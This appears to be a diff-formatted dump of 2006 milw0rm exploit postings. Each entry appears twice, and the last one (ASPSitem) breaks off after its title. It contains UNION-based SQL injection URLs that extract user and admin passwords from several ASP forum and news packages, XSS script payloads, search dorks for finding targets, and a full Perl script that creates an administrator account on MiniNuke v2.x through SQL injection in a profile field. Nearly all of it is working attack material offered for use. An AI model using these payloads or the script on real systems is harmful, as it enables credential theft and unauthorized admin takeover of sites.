### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member
|
||||
|
||||
# milw0rm.com [2006-05-26]
|
||||
# Title : qjForum(member.asp) SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# greetz : Nukedx,TheHacker
|
||||
# Dork : "qjForum"
|
||||
# Exploit:
|
||||
|
||||
# Login before injection.
|
||||
|
||||
### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member
|
||||
|
||||
# milw0rm.com [2006-05-26]
|
||||
|
|
|
@ -1,49 +1,49 @@
|
|||
ENGLISH
|
||||
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
|
||||
# Dork : "Copyright 2004 easy-content forums"
|
||||
# Author : ajann
|
||||
# Exploit;
|
||||
|
||||
SQL INJECT.ON--------------------------------------------------------
|
||||
### http://[target]/[path]/userview.asp?startletter=SQL TEXT
|
||||
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
|
||||
|
||||
Example:
|
||||
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
|
||||
|
||||
XSS--------------------------------------------------------
|
||||
### http://[target]/[path]/userview.asp?startletter=xss TEXT
|
||||
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
|
||||
|
||||
Example:
|
||||
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X
|
||||
|
||||
|
||||
|
||||
|
||||
TURKISH
|
||||
# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
|
||||
# Sözcük[Arama] : "powered by phpmydirectory"
|
||||
# Aç... Bulan : ajann
|
||||
# Aç.k bulunan dosyalar;
|
||||
|
||||
SQL INJECT.ON--------------------------------------------------------
|
||||
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
|
||||
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken
|
||||
|
||||
Örnek:
|
||||
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
|
||||
|
||||
XSS--------------------------------------------------------
|
||||
|
||||
### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
|
||||
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
|
||||
|
||||
Örnek:
|
||||
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.
|
||||
|
||||
Ac.klama:
|
||||
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
|
||||
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.
|
||||
|
||||
# milw0rm.com [2006-05-26]
|
||||
ENGLISH
|
||||
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
|
||||
# Dork : "Copyright 2004 easy-content forums"
|
||||
# Author : ajann
|
||||
# Exploit;
|
||||
|
||||
SQL INJECT.ON--------------------------------------------------------
|
||||
### http://[target]/[path]/userview.asp?startletter=SQL TEXT
|
||||
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
|
||||
|
||||
Example:
|
||||
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
|
||||
|
||||
XSS--------------------------------------------------------
|
||||
### http://[target]/[path]/userview.asp?startletter=xss TEXT
|
||||
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
|
||||
|
||||
Example:
|
||||
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X
|
||||
|
||||
|
||||
|
||||
|
||||
TURKISH
|
||||
# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
|
||||
# Sözcük[Arama] : "powered by phpmydirectory"
|
||||
# Aç... Bulan : ajann
|
||||
# Aç.k bulunan dosyalar;
|
||||
|
||||
SQL INJECT.ON--------------------------------------------------------
|
||||
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
|
||||
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken
|
||||
|
||||
Örnek:
|
||||
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
|
||||
|
||||
XSS--------------------------------------------------------
|
||||
|
||||
### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
|
||||
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
|
||||
|
||||
Örnek:
|
||||
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.
|
||||
|
||||
Ac.klama:
|
||||
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
|
||||
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.
|
||||
|
||||
# milw0rm.com [2006-05-26]
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
|
||||
# Exploit Example:
|
||||
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt
|
||||
|
||||
# milw0rm.com [2006-05-27]
|
||||
# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
|
||||
# Exploit Example:
|
||||
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt
|
||||
|
||||
# milw0rm.com [2006-05-27]
|
||||
|
|
|
@ -1,204 +1,204 @@
|
|||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=31
|
||||
#Usage: mini.pl <host> <path> <user> <pass> <mail>
|
||||
use IO::Socket;
|
||||
if(@ARGV != 5) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-31\r\n";
|
||||
print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n";
|
||||
print "- <user> -> Desired username to create ex: h4x0r\r\n";
|
||||
print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n";
|
||||
print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit ()
|
||||
{
|
||||
#Our variables...
|
||||
$mnserver = $ARGV[0];
|
||||
$mnserver =~ s/(http:\/\/)//eg;
|
||||
$mnhost = "http://".$mnserver;
|
||||
$mndir = $ARGV[1];
|
||||
$mnuser = $ARGV[2];
|
||||
$mnpass = $ARGV[3];
|
||||
$mnmail = $ARGV[4];
|
||||
$mnport = "80";
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $mnserver\r\n";
|
||||
getsession();
|
||||
}
|
||||
sub getsession ()
|
||||
{
|
||||
print "- Getting session for register...\r\n";
|
||||
$mnstar = "membership.asp?action=new";
|
||||
$mnsreq = $mnhost.$mndir.$mnstar;
|
||||
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
|
||||
print $mns "GET $mnsreq HTTP/1.1\n";
|
||||
print $mns "Accept: */*\n";
|
||||
print $mns "Referer: $mnhost\n";
|
||||
print $mns "Accept-Language: tr\n";
|
||||
print $mns "User-Agent: NukeZilla\n";
|
||||
print $mns "Cache-Control: no-cache\n";
|
||||
print $mns "Host: $mnserver\n";
|
||||
print $mns "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$mns>) {
|
||||
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
|
||||
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
|
||||
}
|
||||
#if you are here...
|
||||
die "- Exploit failed\r\n";
|
||||
}
|
||||
sub doregister ()
|
||||
{
|
||||
close($mns);
|
||||
$mntar = "membership.asp?action=register";
|
||||
$mnreq = $mnhost.$mndir.$mntar;
|
||||
print "- Session getting done\r\n";
|
||||
print "- Lets create our user...\r\n";
|
||||
$mndata = "kuladi=".$mnuser;
|
||||
$mndata.= "&password=".$mnpass;
|
||||
$mndata.= "&email=".$mnmail;
|
||||
$mndata.= "&isim=h4x0r";
|
||||
$mndata.= "&g_soru=whooooo";
|
||||
$mndata.= "&g_cevap=h4x0rs";
|
||||
$mndata.= "&icq=1";
|
||||
$mndata.= "&msn=1";
|
||||
$mndata.= "&aim=1";
|
||||
$mndata.= "&sehir=1";
|
||||
$mndata.= "&meslek=1";
|
||||
$mndata.= "&cinsiyet=b";
|
||||
$mndata.= "&yas_1=1";
|
||||
$mndata.= "&yas_2=1";
|
||||
$mndata.= "&yas_3=1920";
|
||||
$mndata.= "&web=http://www.milw0rm.com";
|
||||
$mndata.= "&imza=h4x0r";
|
||||
$mndata.= "&mavatar=IMAGES/avatars/1.gif";
|
||||
$mndata.= "&security_code=".$mngvn;
|
||||
$mndata.= "&mail_goster=on";
|
||||
$mndatalen = length($mndata);
|
||||
$mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
|
||||
print $mn "POST $mnreq HTTP/1.1\r\n";
|
||||
print $mn "Accept: */*\r\n";
|
||||
print $mn "Referer: $mnhost\r\n";
|
||||
print $mn "Accept-Language: tr\r\n";
|
||||
print $mn "Content-Type: application/x-www-form-urlencoded\r\n";
|
||||
print $mn "Accept-Encoding: gzip, deflate\r\n";
|
||||
print $mn "User-Agent: NukeZilla\r\n";
|
||||
print $mn "Cookie: $mncookie\r\n";
|
||||
print $mn "Host: $mnserver\r\n";
|
||||
print $mn "Content-length: $mndatalen\r\n";
|
||||
print $mn "Connection: Keep-Alive\r\n";
|
||||
print $mn "Cache-Control: no-cache\r\n\r\n";
|
||||
print $mn $mndata;
|
||||
print $mn "\r\n\r\n";
|
||||
while ($answer = <$mn>) {
|
||||
if ($answer =~ /Tebrikler !!!/) {
|
||||
print "- Creating user has been done...\r\n";
|
||||
print "- Loginning in to user...\r\n";
|
||||
dologin();
|
||||
}
|
||||
}
|
||||
#if you are here...
|
||||
die "- Exploit failed\r\n";
|
||||
}
|
||||
sub dologin ()
|
||||
{
|
||||
close ($mn);
|
||||
$mnltar = "enter.asp";
|
||||
$mnlreq = $mnhost.$mndir.$mnltar;
|
||||
$mnldata = "kuladi=".$mnuser;
|
||||
$mnldata.= "&password=".$mnpass;
|
||||
$mnldata.= "&guvenlik=423412";
|
||||
$mnldata.= "&gguvenlik=423412";
|
||||
$mnldatalen = length($mnldata);
|
||||
$mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
|
||||
print $mnl "POST $mnlreq HTTP/1.1\r\n";
|
||||
print $mnl "Accept: */*\r\n";
|
||||
print $mnl "Referer: $mnhost\r\n";
|
||||
print $mnl "Accept-Language: tr\r\n";
|
||||
print $mnl "Content-Type: application/x-www-form-urlencoded\r\n";
|
||||
print $mnl "Accept-Encoding: gzip, deflate\r\n";
|
||||
print $mnl "User-Agent: NukeZilla\r\n";
|
||||
print $mnl "Host: $mnserver\r\n";
|
||||
print $mnl "Content-length: $mnldatalen\r\n";
|
||||
print $mnl "Connection: Keep-Alive\r\n";
|
||||
print $mnl "Cache-Control: no-cache\r\n\r\n";
|
||||
print $mnl $mnldata;
|
||||
print $mnl "\r\n\r\n";
|
||||
while ($answer = <$mnl>) {
|
||||
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; }
|
||||
if ($answer =~ /Cache-control:/) { doadmin(); }
|
||||
}
|
||||
#if you are here...
|
||||
die "- Exploit failed\r\n";
|
||||
}
|
||||
sub doadmin ()
|
||||
{
|
||||
close($mnl);
|
||||
print "- Editing profile..\r\n";
|
||||
$mnptar = "Your_Account.asp?op=UpdateProfile";
|
||||
$mnpreq = $mnhost.$mndir.$mnptar;
|
||||
$mnpdata.= "email=".$mnmail;
|
||||
$mnpdata.= "&isim=h4x0r";
|
||||
$mnpdata.= "&g_soru=whooooo";
|
||||
$mnpdata.= "&g_cevap=h4x0rs";
|
||||
$mnpdata.= "&icq=1";
|
||||
$mnpdata.= "&msn=1";
|
||||
$mnpdata.= "&aim=1";
|
||||
$mnpdata.= "&sehir=1";
|
||||
$mnpdata.= "&meslek=1";
|
||||
$mnpdata.= "&cinsiyet=b";
|
||||
$mnpdata.= "&yas_1=1";
|
||||
$mnpdata.= "&yas_2=1";
|
||||
$mnpdata.= "&yas_3=1920',seviye='1";
|
||||
$mnpdata.= "&web=http://www.milw0rm.com";
|
||||
$mnpdata.= "&imza=h4x0r";
|
||||
$mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
|
||||
$mnpdata.= "&mail_goster=on";
|
||||
$mnpdatalen = length($mnpdata);
|
||||
$mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
|
||||
print $mnp "POST $mnpreq HTTP/1.1\r\n";
|
||||
print $mnp "Accept: */*\r\n";
|
||||
print $mnp "Referer: $mnhost\r\n";
|
||||
print $mnp "Accept-Language: tr\r\n";
|
||||
print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
|
||||
print $mnp "Accept-Encoding: gzip, deflate\r\n";
|
||||
print $mnp "User-Agent: NukeZilla\r\n";
|
||||
print $mnp "Cookie: $mnlcookie\r\n";
|
||||
print $mnp "Host: $mnserver\r\n";
|
||||
print $mnp "Content-length: $mnpdatalen\r\n";
|
||||
print $mnp "Connection: Keep-Alive\r\n";
|
||||
print $mnp "Cache-Control: no-cache\r\n\r\n";
|
||||
print $mnp $mnpdata;
|
||||
print $mn "\r\n\r\n";
|
||||
while ($answer = <$mnp>) {
|
||||
if ($answer =~ /Tebrikler !!!/) {
|
||||
print "- Editing profile been done...\r\n";
|
||||
print "- Exploiting finished succesfully\r\n";
|
||||
print "- Your username $mnuser has been created as admin\r\n";
|
||||
print "- You can login with password $mnpass on $mnlreq\r\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /Üyeler Açýktýr/) {
|
||||
print "- Exploit failed\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
#if you are here...
|
||||
die "- Exploit failed\r\n";
|
||||
}
|
||||
# nukedx.com [2006-05-27]
|
||||
|
||||
# milw0rm.com [2006-05-27]
|
||||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=31
|
||||
#Usage: mini.pl <host> <path> <user> <pass> <mail>
|
||||
use IO::Socket;
|
||||
if(@ARGV != 5) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-31\r\n";
|
||||
print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n";
|
||||
print "- <user> -> Desired username to create ex: h4x0r\r\n";
|
||||
print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n";
|
||||
print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit ()
|
||||
{
|
||||
#Our variables...
|
||||
$mnserver = $ARGV[0];
|
||||
$mnserver =~ s/(http:\/\/)//eg;
|
||||
$mnhost = "http://".$mnserver;
|
||||
$mndir = $ARGV[1];
|
||||
$mnuser = $ARGV[2];
|
||||
$mnpass = $ARGV[3];
|
||||
$mnmail = $ARGV[4];
|
||||
$mnport = "80";
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $mnserver\r\n";
|
||||
getsession();
|
||||
}
|
||||
sub getsession ()
|
||||
{
|
||||
print "- Getting session for register...\r\n";
|
||||
$mnstar = "membership.asp?action=new";
|
||||
$mnsreq = $mnhost.$mndir.$mnstar;
|
||||
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
|
||||
print $mns "GET $mnsreq HTTP/1.1\n";
|
||||
print $mns "Accept: */*\n";
|
||||
print $mns "Referer: $mnhost\n";
|
||||
print $mns "Accept-Language: tr\n";
|
||||
print $mns "User-Agent: NukeZilla\n";
|
||||
print $mns "Cache-Control: no-cache\n";
|
||||
print $mns "Host: $mnserver\n";
|
||||
print $mns "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$mns>) {
|
||||
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
|
||||
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
|
||||
}
|
||||
#if you are here...
|
||||
die "- Exploit failed\r\n";
|
||||
}
|
||||
sub doregister ()
|
||||
{
|
||||
close($mns);
|
||||
$mntar = "membership.asp?action=register";
|
||||
$mnreq = $mnhost.$mndir.$mntar;
|
||||
print "- Session getting done\r\n";
|
||||
print "- Lets create our user...\r\n";
|
||||
$mndata = "kuladi=".$mnuser;
|
||||
$mndata.= "&password=".$mnpass;
|
||||
$mndata.= "&email=".$mnmail;
|
||||
$mndata.= "&isim=h4x0r";
|
||||
$mndata.= "&g_soru=whooooo";
|
||||
$mndata.= "&g_cevap=h4x0rs";
|
||||
$mndata.= "&icq=1";
|
||||
$mndata.= "&msn=1";
|
||||
$mndata.= "&aim=1";
|
||||
$mndata.= "&sehir=1";
|
||||
$mndata.= "&meslek=1";
|
||||
$mndata.= "&cinsiyet=b";
|
||||
$mndata.= "&yas_1=1";
|
||||
$mndata.= "&yas_2=1";
|
||||
$mndata.= "&yas_3=1920";
|
||||
$mndata.= "&web=http://www.milw0rm.com";
|
||||
$mndata.= "&imza=h4x0r";
|
||||
$mndata.= "&mavatar=IMAGES/avatars/1.gif";
|
||||
$mndata.= "&security_code=".$mngvn;
|
||||
$mndata.= "&mail_goster=on";
|
||||
$mndatalen = length($mndata);
|
||||
$mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
|
||||
print $mn "POST $mnreq HTTP/1.1\r\n";
|
||||
print $mn "Accept: */*\r\n";
|
||||
print $mn "Referer: $mnhost\r\n";
|
||||
print $mn "Accept-Language: tr\r\n";
|
||||
print $mn "Content-Type: application/x-www-form-urlencoded\r\n";
|
||||
print $mn "Accept-Encoding: gzip, deflate\r\n";
|
||||
print $mn "User-Agent: NukeZilla\r\n";
|
||||
print $mn "Cookie: $mncookie\r\n";
|
||||
print $mn "Host: $mnserver\r\n";
|
||||
print $mn "Content-length: $mndatalen\r\n";
|
||||
print $mn "Connection: Keep-Alive\r\n";
|
||||
print $mn "Cache-Control: no-cache\r\n\r\n";
|
||||
print $mn $mndata;
|
||||
print $mn "\r\n\r\n";
|
||||
while ($answer = <$mn>) {
|
||||
if ($answer =~ /Tebrikler !!!/) {
|
||||
print "- Creating user has been done...\r\n";
|
||||
print "- Loginning in to user...\r\n";
|
||||
dologin();
|
||||
}
|
||||
}
|
||||
#if you are here...
|
||||
die "- Exploit failed\r\n";
|
||||
}
|
||||
sub dologin ()
|
||||
{
|
||||
close ($mn);
|
||||
$mnltar = "enter.asp";
|
||||
$mnlreq = $mnhost.$mndir.$mnltar;
|
||||
$mnldata = "kuladi=".$mnuser;
|
||||
$mnldata.= "&password=".$mnpass;
|
||||
$mnldata.= "&guvenlik=423412";
|
||||
$mnldata.= "&gguvenlik=423412";
|
||||
$mnldatalen = length($mnldata);
|
||||
$mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
|
||||
print $mnl "POST $mnlreq HTTP/1.1\r\n";
|
||||
print $mnl "Accept: */*\r\n";
|
||||
print $mnl "Referer: $mnhost\r\n";
|
||||
print $mnl "Accept-Language: tr\r\n";
|
||||
print $mnl "Content-Type: application/x-www-form-urlencoded\r\n";
|
||||
print $mnl "Accept-Encoding: gzip, deflate\r\n";
|
||||
print $mnl "User-Agent: NukeZilla\r\n";
|
||||
print $mnl "Host: $mnserver\r\n";
|
||||
print $mnl "Content-length: $mnldatalen\r\n";
|
||||
print $mnl "Connection: Keep-Alive\r\n";
|
||||
print $mnl "Cache-Control: no-cache\r\n\r\n";
|
||||
print $mnl $mnldata;
|
||||
print $mnl "\r\n\r\n";
|
||||
while ($answer = <$mnl>) {
|
||||
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; }
|
||||
if ($answer =~ /Cache-control:/) { doadmin(); }
|
||||
}
|
||||
#if you are here...
|
||||
die "- Exploit failed\r\n";
|
||||
}
|
||||
sub doadmin ()
|
||||
{
|
||||
close($mnl);
|
||||
print "- Editing profile..\r\n";
|
||||
$mnptar = "Your_Account.asp?op=UpdateProfile";
|
||||
$mnpreq = $mnhost.$mndir.$mnptar;
|
||||
$mnpdata.= "email=".$mnmail;
|
||||
$mnpdata.= "&isim=h4x0r";
|
||||
$mnpdata.= "&g_soru=whooooo";
|
||||
$mnpdata.= "&g_cevap=h4x0rs";
|
||||
$mnpdata.= "&icq=1";
|
||||
$mnpdata.= "&msn=1";
|
||||
$mnpdata.= "&aim=1";
|
||||
$mnpdata.= "&sehir=1";
|
||||
$mnpdata.= "&meslek=1";
|
||||
$mnpdata.= "&cinsiyet=b";
|
||||
$mnpdata.= "&yas_1=1";
|
||||
$mnpdata.= "&yas_2=1";
|
||||
$mnpdata.= "&yas_3=1920',seviye='1";
|
||||
$mnpdata.= "&web=http://www.milw0rm.com";
|
||||
$mnpdata.= "&imza=h4x0r";
|
||||
$mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
|
||||
$mnpdata.= "&mail_goster=on";
|
||||
$mnpdatalen = length($mnpdata);
|
||||
$mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
|
||||
print $mnp "POST $mnpreq HTTP/1.1\r\n";
|
||||
print $mnp "Accept: */*\r\n";
|
||||
print $mnp "Referer: $mnhost\r\n";
|
||||
print $mnp "Accept-Language: tr\r\n";
|
||||
print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
|
||||
print $mnp "Accept-Encoding: gzip, deflate\r\n";
|
||||
print $mnp "User-Agent: NukeZilla\r\n";
|
||||
print $mnp "Cookie: $mnlcookie\r\n";
|
||||
print $mnp "Host: $mnserver\r\n";
|
||||
print $mnp "Content-length: $mnpdatalen\r\n";
|
||||
print $mnp "Connection: Keep-Alive\r\n";
|
||||
print $mnp "Cache-Control: no-cache\r\n\r\n";
|
||||
print $mnp $mnpdata;
|
||||
print $mn "\r\n\r\n";
|
||||
while ($answer = <$mnp>) {
|
||||
if ($answer =~ /Tebrikler !!!/) {
|
||||
print "- Editing profile been done...\r\n";
|
||||
print "- Exploiting finished succesfully\r\n";
|
||||
print "- Your username $mnuser has been created as admin\r\n";
|
||||
print "- You can login with password $mnpass on $mnlreq\r\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /Üyeler Açýktýr/) {
|
||||
print "- Exploit failed\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
#if you are here...
|
||||
die "- Exploit failed\r\n";
|
||||
}
|
||||
# nukedx.com [2006-05-27]
|
||||
|
||||
# milw0rm.com [2006-05-27]
|
||||
|
|
|
@ -1,25 +1,25 @@
|
|||
Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
|
||||
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
|
||||
This exploits works on Enigma Haber <= 4.3
|
||||
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
|
||||
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
|
||||
http://[site]/enigmadir/yazdir.asp?hid=SQL
|
||||
http://[site]/enigmadir/yorum.asp?hid=SQL
|
||||
http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
|
||||
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
|
||||
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
|
||||
http://[site]/enigmadir/haber_devam.asp?id=SQL
|
||||
Examples in the below needs admin rights.
|
||||
http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
|
||||
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
|
||||
http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
|
||||
http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
|
||||
http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
|
||||
http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
|
||||
http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
|
||||
http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
|
||||
http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
|
||||
|
||||
# nukedx.com [2006-05-27]
|
||||
|
||||
# milw0rm.com [2006-05-28]
|
||||
Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
|
||||
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
|
||||
This exploits works on Enigma Haber <= 4.3
|
||||
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
|
||||
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
|
||||
http://[site]/enigmadir/yazdir.asp?hid=SQL
|
||||
http://[site]/enigmadir/yorum.asp?hid=SQL
|
||||
http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
|
||||
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
|
||||
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
|
||||
http://[site]/enigmadir/haber_devam.asp?id=SQL
|
||||
Examples in the below needs admin rights.
|
||||
http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
|
||||
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
|
||||
http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
|
||||
http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
|
||||
http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
|
||||
http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
|
||||
http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
|
||||
http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
|
||||
http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
|
||||
|
||||
# nukedx.com [2006-05-27]
|
||||
|
||||
# milw0rm.com [2006-05-28]
|
||||
|
|
|
@ -1,15 +1,15 @@
|
|||
ASPSitem <= 2.0 Multiple Vulnerabilities.
|
||||
